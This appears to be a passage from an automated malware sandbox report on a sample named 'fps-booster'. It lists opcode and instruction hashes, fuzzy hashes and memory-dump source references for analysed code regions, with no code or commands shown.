              • Opcode Fuzzy Hash: 2fea7fb4eefa4de90090e57ee8b9b2fe9742aa19bc8085bdff5f565e53c9e3e2
              • Instruction Fuzzy Hash: 2131E6317212178FCB15EB38D8A467EBBE5FF89340B148579D906DB388EB74AC4187A1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d5549863763b7fa27768deb0185320486f00bd4e0a2f0e6dcf511142d0327d7
              • Instruction ID: ffe088ba8cbfa878cb8a8b28476f3076e5e67439c2a847e10ca8ec08bd51998a
              • Opcode Fuzzy Hash: 3d5549863763b7fa27768deb0185320486f00bd4e0a2f0e6dcf511142d0327d7
              • Instruction Fuzzy Hash: 7731D5317222538FCB15EB38E4D467EBBE6BF89340B148569DD06DB388EB349C418B91
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9132f5018a6658bd1cb8b84635a66732a14badb66806942a44b8dbefb8120600
              • Instruction ID: 20dbbded01d7962baf7f947e601a9d3efeea2cabea01d115bdaced9ec4e2ad8c
              • Opcode Fuzzy Hash: 9132f5018a6658bd1cb8b84635a66732a14badb66806942a44b8dbefb8120600
              • Instruction Fuzzy Hash: B2317530610702CFD725DF39D580A56B7F2FF897117608A2DE58A8BAA5D771F846CB40
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e0075b835e4fcdcc74217b431fe28ee70a7b1fdaff78e8ccf7668432508276d
              • Instruction ID: 77b5e184448f42f3d3d7ef86f3bde7638e48ccac2c77ef2528cf765d2d92b64e
              • Opcode Fuzzy Hash: 9e0075b835e4fcdcc74217b431fe28ee70a7b1fdaff78e8ccf7668432508276d
              • Instruction Fuzzy Hash: EC31F431F042158FCB159B69C4A8AAEBFF2EF89711F54417AE901EB3A1CE754C05CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7963b42404b411f14e5c221d259681debe0b5bf66be667d25db4871495bce68
              • Instruction ID: db6550549a37e8769af232af0cf0f1f316ba4994f425781de29f2ef22ad6043d
              • Opcode Fuzzy Hash: f7963b42404b411f14e5c221d259681debe0b5bf66be667d25db4871495bce68
              • Instruction Fuzzy Hash: A5313A35B10209CFCB14CB98D998AEDBBB6FF88315F184069E606B73A5CB35AC51CB51
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49e57f9f8bbfa382776367e4c41167d88e238fa6a88e0f38d522a47e771932b6
              • Instruction ID: 96ee6dcfbbad4e9fda5ba4c8e0c0910b95a3b3d21bbf562d574a1a36087a2dda
              • Opcode Fuzzy Hash: 49e57f9f8bbfa382776367e4c41167d88e238fa6a88e0f38d522a47e771932b6
              • Instruction Fuzzy Hash: 0421B3317042058FD714DB6DE49496A7BE7EFCE310728486DE246CB356DB24DC028B51
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7cd97afdcf7f7751aaf73d3d8bac7ccff1dd6b8f928a94f392076341be1ed62
              • Instruction ID: fcc374da705c97000d75c20710c67353271baaac5daf711ce9e6e70491191252
              • Opcode Fuzzy Hash: f7cd97afdcf7f7751aaf73d3d8bac7ccff1dd6b8f928a94f392076341be1ed62
              • Instruction Fuzzy Hash: 06213274A21218DFDB05ABB8E868BAE7BB6BF98700F110428E506E7385EE345D41CF55
              Memory Dump Source
              • Source File: 00000000.00000002.2483971168.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_102d000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a06cb6ae91a0ed86526447d72a9fc41c76b985b76b300fc1e5213619bea8dcd3
              • Instruction ID: 96d5094f7ea308b9c185edbbb4071fce1ca6d89dd223add5fde77de1b6f776a6
              • Opcode Fuzzy Hash: a06cb6ae91a0ed86526447d72a9fc41c76b985b76b300fc1e5213619bea8dcd3
              • Instruction Fuzzy Hash: E92148B1504244EFDB15DF94D9C4B1ABFA1FB88314F2085ADD9490B247C336D856CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02a937a39b84dabf04e046ecf8ad1e488119952bc658d351a3c0296e523896f6
              • Instruction ID: afe71bf04f1d80aed035c7a3b51cee70d6177649e8e64fbaac5d4a27fe2bf388
              • Opcode Fuzzy Hash: 02a937a39b84dabf04e046ecf8ad1e488119952bc658d351a3c0296e523896f6
              • Instruction Fuzzy Hash: F61127313092545FD705577A986496BBFE7EFCA220719817FE50ACB3A2CD388C01C3A5
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b9f38068a684e9e87261e0d1bedfd728023be0d299e8c835ba0db032b708280d
              • Instruction ID: 225f71e28e61252ea52b9824abe6dece8db9a8215dba36436dcdf326f849923c
              • Opcode Fuzzy Hash: b9f38068a684e9e87261e0d1bedfd728023be0d299e8c835ba0db032b708280d
              • Instruction Fuzzy Hash: E011D670A107168FC721DF68E8944EEFFF4EF887007004529E946EB354DB749A058BA0
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9e5db3f124fa8d25f9ede708d7dc65c312c3e19ce57a4d06b924ffed906d589
              • Instruction ID: bb5aa726b50b6b371f500d10d2906784d1cb544412cf722ed8784331e75d495c
              • Opcode Fuzzy Hash: d9e5db3f124fa8d25f9ede708d7dc65c312c3e19ce57a4d06b924ffed906d589
              • Instruction Fuzzy Hash: F7210738B101198FDB44DBA8D494E99B7F6BF89315F1140A4EA05EB3A6DA75EC01CF60
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e2ebb4c0254228d5ef6e716a8ccafabfba9931a9bf14b395c4e2c3a5f06bfb0
              • Instruction ID: b156196704fbef6aff3b364d5d698040ca0f0add71c706c95086e2cc05e5cfdc
              • Opcode Fuzzy Hash: 7e2ebb4c0254228d5ef6e716a8ccafabfba9931a9bf14b395c4e2c3a5f06bfb0
              • Instruction Fuzzy Hash: 4A11A970E00115DFCB15DB68C098AADBBF2AF8C311F14406AE902FB3A5CA715C42CBA0
              Memory Dump Source
              • Source File: 00000000.00000002.2483971168.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_102d000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
              • Instruction ID: 38f0414ecb6873ddfa9c84b8ae79a1d461ccaa8700357fba89701de559fc6409
              • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
              • Instruction Fuzzy Hash: B611E172504244DFDB12CF54D5C4B16BFB2FB88314F24C6A9D8490B257C33AD85ACBA2
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27e90c1212ddb40ebbcc8cdb6eb2a0bb3c033eaa9f0ff8cacfe78f5db8db342d
              • Instruction ID: 338ee298a19b241eb0881e906b4e9ccbbafa87a9ecf3ad87edc15c6d4b7b084f
              • Opcode Fuzzy Hash: 27e90c1212ddb40ebbcc8cdb6eb2a0bb3c033eaa9f0ff8cacfe78f5db8db342d
              • Instruction Fuzzy Hash: 8A01287061D1854FC31A9B78D4949AABFA1EF46300F140DEEC6948F7A3CA616C15CB42
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 685ff58c67b76bb8e2ac1f41a6a2adc2147931ebe900d60609901ce7bcbdcb29
              • Instruction ID: a125fd86fa6bbb7a407cfdc1744abaac257f28b31b628d9e2fcd4783a3084464
              • Opcode Fuzzy Hash: 685ff58c67b76bb8e2ac1f41a6a2adc2147931ebe900d60609901ce7bcbdcb29
              • Instruction Fuzzy Hash: 50119E79A10119CFDB44DF68D884E99B7F1FF89325F2140A4E905AB362CA75ED41CF60
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa69eaed097bc893b2c9eef2bb92d0e5dd19f70ac9a16450e47f64a7d0ce87c9
              • Instruction ID: 6cc363e6c7a5f70d493918064aa15a048faa207bb03d80c089a0f9b9e5adb1c1
              • Opcode Fuzzy Hash: fa69eaed097bc893b2c9eef2bb92d0e5dd19f70ac9a16450e47f64a7d0ce87c9
              • Instruction Fuzzy Hash: 03F028312093925FC717A67CA8B09DE7FA1EEC735430405AFE089CF242CA58980983A2
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b32e67ccc81914f8d080e85778a2e91fc626e18324ba2617ebd75924e21bc13
              • Instruction ID: 27937bf6174771beaee3db8e248d2c43d0fe38d13fb5b079a440231d50ac4d60
              • Opcode Fuzzy Hash: 9b32e67ccc81914f8d080e85778a2e91fc626e18324ba2617ebd75924e21bc13
              • Instruction Fuzzy Hash: 4001F7302043515FC722AB78A4A06AE7FE3EFD63157044A1DE14A8F761DB79180987A1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed02a8ad12986f6456fa0196b609d4f85067ebbd33cd1c92cfcfd8faf1933901
              • Instruction ID: dd4613c0e302139bdca98bdc26f6c77e3d80ca8c116eca9113942c7947cbff76
              • Opcode Fuzzy Hash: ed02a8ad12986f6456fa0196b609d4f85067ebbd33cd1c92cfcfd8faf1933901
              • Instruction Fuzzy Hash: 82F096302042568FC719DB3DE8E0DA97BE5EFCA300315466DE145CF652DB20AC05C750
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 78ff9c8667b2ad566d28759aac53dca659c9aa597d822ecbcb8fb565703b7a2e
              • Instruction ID: b5eee2eed672ac1f236a6d2414ed056b79e44096f3b3ca21ca51449088e9b397
              • Opcode Fuzzy Hash: 78ff9c8667b2ad566d28759aac53dca659c9aa597d822ecbcb8fb565703b7a2e
              • Instruction Fuzzy Hash: BAF0C231321291CFD319DF34F55586A7BB2AF8271534009BFE9468B285CB30AC45CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec6311f42793187eb70b8161cbb366103dd6e10354af16f4436fd65b789750a0
              • Instruction ID: 67c7d211a5e4b30249fb88ae99c977bfcd64b259632bf15b8ed088e995c83fc2
              • Opcode Fuzzy Hash: ec6311f42793187eb70b8161cbb366103dd6e10354af16f4436fd65b789750a0
              • Instruction Fuzzy Hash: 93F0B4312046618FCB05EB7CF4B09E97BB3EF8621070545AFC18A8F556DB65680AC752
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57c3f1b6041cce473ec02ea6f563149e464dd0ae047df4af02f440c8f507f456
              • Instruction ID: 1679f84d4b6b37b0cfdd5c1260587b5156a4ff7b83a2ec54617ae562c788b236
              • Opcode Fuzzy Hash: 57c3f1b6041cce473ec02ea6f563149e464dd0ae047df4af02f440c8f507f456
              • Instruction Fuzzy Hash: BCF0E932F052909FC711DF7894442D57FF1FF8622070849FAC544C7681EA308806C791
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07da51ef77e5aa55f89cdb2c98d19ff2009e2c115c5d5e589b16cee5944983a8
              • Instruction ID: 989d511b8a1304598e72f494ee58c67aa0207f2efb4e1000fe810e01be28cdc8
              • Opcode Fuzzy Hash: 07da51ef77e5aa55f89cdb2c98d19ff2009e2c115c5d5e589b16cee5944983a8
              • Instruction Fuzzy Hash: C6F03A307052428BC721DB6CE8B09AA7BA6AFC925030946AEE146CF665EB64DC058755
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 76bc7909d194a53e56867f49892d7728c1485b8f51c1675b8290993bc4d6d8b1
              • Instruction ID: e0a8c5096a232b15fab2e4dc7736afe62608b8d510ea925a83cfc0a1ebda510e
              • Opcode Fuzzy Hash: 76bc7909d194a53e56867f49892d7728c1485b8f51c1675b8290993bc4d6d8b1
              • Instruction Fuzzy Hash: 74F0AB3670E3504FC3231334A82889E6FB68FC661131900BEE801CB392CEA88C06C7A2
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16cb3e2fbebe2487bda3c6e45ae514f836977b0c38135dd6f492b85a2033032c
              • Instruction ID: 70e68aaca0982bf3afcdf2f4f3fd9d4ffbd20f6fb6dd5cef5e527fae23218805
              • Opcode Fuzzy Hash: 16cb3e2fbebe2487bda3c6e45ae514f836977b0c38135dd6f492b85a2033032c
              • Instruction Fuzzy Hash: E3E065357152409FC311976E9898CA6BFE5EFCA72431541AEF546C7362C9719C10C750
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5072577ccbdd7e39ec70a5da84a6a21fcbc8e7a0baa47899bc28527e7b2db5b4
              • Instruction ID: 06bbca4ac747b303cd8e501b6771e27121a6b8cb129607b219b1840a50f0cc4b
              • Opcode Fuzzy Hash: 5072577ccbdd7e39ec70a5da84a6a21fcbc8e7a0baa47899bc28527e7b2db5b4
              • Instruction Fuzzy Hash: 1FE022352542509FC704BB7AF970E263F69FFCAB10B0540AAE085CB395CA206D05C3A2
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a62e0373682216898f66f52230167234b8a0c8574b1b1f149dede22896f8b32e
              • Instruction ID: 0a523de3aa24aec9e99602c3e7075a39d1d46d4d89b3aa7569fba9415fbd7cff
              • Opcode Fuzzy Hash: a62e0373682216898f66f52230167234b8a0c8574b1b1f149dede22896f8b32e
              • Instruction Fuzzy Hash: 36E0D8363092645F8706576C68909797FB6DECF95530601AFF006CF242C9550C05C761
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e18204aee5b0abd0c82ab260cba04c8d3d5e911b802e7aafd836e1a8fa5d3055
              • Instruction ID: 796d49491b47bbd8a391cdc7d92f9bb9740956a93bc1acddb4a6a56e8517a504
              • Opcode Fuzzy Hash: e18204aee5b0abd0c82ab260cba04c8d3d5e911b802e7aafd836e1a8fa5d3055
              • Instruction Fuzzy Hash: 4CF0AC70D09248DFCB45DFE8D45459C7FB0AF45310F0044EED845A7361E6745A54CF81
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7bafe2252fd6558b4912684f23487fbaab77833ec76645f51965b030aa803e57
              • Instruction ID: e0f6cc94bad5bc4db33d807593c1aff6454d3e44c675dc57e0e4de036425e674
              • Opcode Fuzzy Hash: 7bafe2252fd6558b4912684f23487fbaab77833ec76645f51965b030aa803e57
              • Instruction Fuzzy Hash: AFE0ED7090A288AFCB02DFB8D8A199C7FB1EF5A204B1506DED445DB112E6751E14DB51
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9001aba74fdcc03ed4598ebfbac0318ace7357fd707f1af1049b3318fe28819b
              • Instruction ID: fbc618f3c67e1db19478813e1ab8c2dfa6fcf96261b5377fccdb6d9bad6315c1
              • Opcode Fuzzy Hash: 9001aba74fdcc03ed4598ebfbac0318ace7357fd707f1af1049b3318fe28819b
              • Instruction Fuzzy Hash: B7E04F3061D2818FCB09CB38D8E4928BF71AE4A20430546EDD44BDB247D661A816CB11
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c4562f2dded78edca3143c40da2308b1f421612824cf4edfa71f458ed22ac0f
              • Instruction ID: 025855390a75ec7e32cd45e90f497f24323144d15bd6cc957809f3962d40cdca
              • Opcode Fuzzy Hash: 1c4562f2dded78edca3143c40da2308b1f421612824cf4edfa71f458ed22ac0f
              • Instruction Fuzzy Hash: 29D0A737304639970105369D741457E7ADFE6CD96A356003FF609CB341DD554C0183E5
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 990ef09a758f4f5cc9bc6c40ab28e344393c73def33305ef6c7a25d33ac8a0bd
              • Instruction ID: d962afdc30cfc454cbb7e7ff497d5d6645a9cd9bd981965f5ce271866981061c
              • Opcode Fuzzy Hash: 990ef09a758f4f5cc9bc6c40ab28e344393c73def33305ef6c7a25d33ac8a0bd
              • Instruction Fuzzy Hash: 58E09270E0520CEFCB44EFA8E45459DBBB5EB88300F0085A99809A7350EA346A548F81
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b85d8cea0bb3816335ddd4746d14e8bfede31c9966536f3fe1003fdfbef40cb
              • Instruction ID: 08759667dcb11b6eaca5f1b2c29301441d04b920950ca2680883560be895cf33
              • Opcode Fuzzy Hash: 9b85d8cea0bb3816335ddd4746d14e8bfede31c9966536f3fe1003fdfbef40cb
              • Instruction Fuzzy Hash: A7E0C231509292CFCB06CF28CC919643FB1AF1231472E40EED044CF673C225D916DB51
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3479527f4af39898f8e08cf9d76542287b8db9234ce26b2753073a04d3dcdd1a
              • Instruction ID: e8adce754239e463655716a15971a3610b0dc7afd0e15804be62c0438ce5f6ac
              • Opcode Fuzzy Hash: 3479527f4af39898f8e08cf9d76542287b8db9234ce26b2753073a04d3dcdd1a
              • Instruction Fuzzy Hash: 84D05E70E0820DEFCB41EFB8E95159DBBF9EBA9314B5045ADE408D7200EA366F10DB90
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ade6d1d70835f175b75b472c2a5586df3c59963c913928f9e553adcb15c79d98
              • Instruction ID: cb596426c0ca940d17e8a8c96da7d0bc060efbab907060deef01658a66549ee7
              • Opcode Fuzzy Hash: ade6d1d70835f175b75b472c2a5586df3c59963c913928f9e553adcb15c79d98
              • Instruction Fuzzy Hash: E0C080317411254FC704965DD410D5937DDDF49B24B0100B6F506CB771CE92EC4047D4
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c3fb1fad1efaa50c89aa72b0fe53f5f7d24a4fb3287c93d8342fdd0c7fbda00a
              • Instruction ID: 7bb73b0563f00c246bfd22f0f9ff0eaf2bc70e12f9761310d9003cdf368c5d1f
              • Opcode Fuzzy Hash: c3fb1fad1efaa50c89aa72b0fe53f5f7d24a4fb3287c93d8342fdd0c7fbda00a
              • Instruction Fuzzy Hash: D7D0523010A7888FC71ACF288AA09223B209E0B70070606CAE4898F262C1202928CB62
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin